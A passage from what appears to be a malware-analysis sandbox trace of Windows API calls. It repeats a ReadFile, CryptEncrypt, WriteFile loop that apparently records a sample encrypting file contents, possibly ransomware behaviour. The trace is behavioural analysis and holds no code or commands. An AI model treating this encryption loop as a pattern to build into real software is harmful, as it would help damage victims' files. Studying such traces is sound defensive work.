Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.359] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.359] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.360] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.360] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.360] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.360] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.360] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.360] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.360] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.360] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.362] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.362] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.362] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.362] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.363] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.364] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.364] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.364] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.364] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.366] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.367] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.367] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.367] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.367] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.367] ReadFile (in: hFile=0x5d48, 